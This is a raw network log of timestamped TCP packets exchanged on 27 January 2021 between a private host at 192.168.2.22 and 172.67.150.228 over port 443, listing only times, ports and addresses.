Jan 27, 2021 04:10:09.646744967 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.647353888 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.647391081 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.647418022 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.647418022 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.647429943 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.647443056 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.647468090 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.647475004 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.647480011 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.647505045 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.647521973 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.647530079 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.647561073 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.647582054 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.648407936 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.648855925 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.648904085 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.648916960 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.648946047 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.648962975 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.648982048 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.648998976 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.649019003 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.649024010 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.649074078 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.649610043 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.649686098 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.649696112 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.649736881 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.649753094 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.649775028 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.649801016 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.649811029 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.649820089 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.649848938 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.649877071 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.649887085 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.649893999 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.649934053 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.649944067 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.649975061 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.650000095 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.650028944 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.650182009 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.650224924 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.650239944 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.650260925 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.650288105 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.650298119 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.650299072 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.650335073 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.650363922 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.650372982 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.650374889 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.650428057 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.652000904 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.652043104 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.652080059 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.652081966 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.652097940 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.652126074 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.652154922 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.652168989 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.652183056 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.652205944 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.652224064 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.652244091 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.652249098 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.652297020 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.653525114 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.653583050 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.653614044 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.653620958 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.653630972 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.653659105 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.653677940 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.653691053 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.653701067 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.653753042 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.654500961 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.654546022 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.654571056 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.654582977 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.654616117 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.654637098 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.654654026 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.654664040 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.654691935 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.654726982 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.654789925 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.654833078 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.654838085 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.654871941 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.654877901 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.654910088 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.654923916 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.654948950 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.654953957 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.654984951 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.654998064 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.655024052 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.655030966 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.655069113 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.655706882 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.655747890 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.655760050 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.655786991 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.655801058 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.655824900 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.655831099 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.655863047 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.655877113 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.655914068 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.657855988 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.687447071 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.687491894 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.688138008 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.688252926 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.688281059 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.688318968 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.688349009 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.688355923 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.688371897 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.688396931 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.688402891 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.688433886 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.688433886 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.688456059 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.688503027 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.691520929 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.691565037 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.691601038 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.691627979 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.691667080 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.691704035 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.691740990 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.691766024 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.691812992 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.691857100 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.691881895 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.691919088 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.691956043 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.691992044 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692028999 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692065954 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692112923 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692145109 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692181110 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692217112 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692254066 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692290068 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692327976 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692363977 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692409992 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692450047 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692486048 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692524910 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692560911 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692595005 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692624092 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692718983 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692759991 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692796946 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692795038 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.692832947 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692864895 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.692871094 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692871094 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.692876101 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.692907095 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.692917109 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692936897 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.692959070 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.692980051 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.692996025 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693025112 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693032980 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693069935 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693072081 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693093061 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693109035 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693125963 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693145990 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693173885 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693182945 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693231106 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693264008 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693273067 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693305016 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693334103 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693341970 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693346024 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693378925 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693448067 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693454027 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693476915 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693485975 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693505049 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693537951 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693747044 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693778992 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693785906 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693814039 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693823099 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693829060 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693861961 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693887949 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693900108 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693907976 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693949938 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693977118 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.693985939 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.693998098 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694022894 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694048882 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694060087 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694077969 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694094896 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694108963 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694132090 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694161892 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694169044 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694180965 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694215059 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694232941 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694257021 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694288969 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694293976 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694308043 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694329023 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694355965 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694391012 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694417953 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694453955 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694483042 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694499016 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694516897 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694541931 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694566965 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694577932 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694588900 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694616079 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694647074 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694654942 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694680929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694693089 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694715023 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694729090 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694760084 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694766998 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694793940 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694813013 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694829941 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694854021 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694881916 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.694885969 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694921970 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694937944 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.694971085 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695009947 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695034981 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695044994 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695055008 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695091009 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695106983 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695133924 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695152998 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695174932 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695193052 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695213079 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695241928 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695250988 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695259094 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695288897 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695297956 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695327044 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695346117 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695365906 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695388079 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695411921 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695420980 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695455074 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695472002 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695492029 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695518970 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695527077 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695530891 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695569038 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695595026 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695604086 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695620060 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695642948 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695660114 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695681095 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695703030 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695733070 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.695951939 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.695992947 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696007013 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696031094 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696048021 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696079969 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696089983 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696121931 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696135998 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696157932 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696177006 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696196079 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696221113 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696233988 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696248055 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696269989 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696295977 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696306944 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696332932 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696345091 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696362019 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696391106 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696393013 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696433067 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696446896 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696469069 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696491003 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696515083 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696552038 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696588039 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696593046 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696608067 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696615934 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696626902 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696635008 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696664095 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696690083 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696701050 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696880102 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696928024 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696945906 CET	49165	443	192.168.2.22	172.67.150.228
Jan 27, 2021 04:10:09.696969986 CET	443	49165	172.67.150.228	192.168.2.22
Jan 27, 2021 04:10:09.696986914 CET	49165	443	192.168.2.22	172.67.150.228
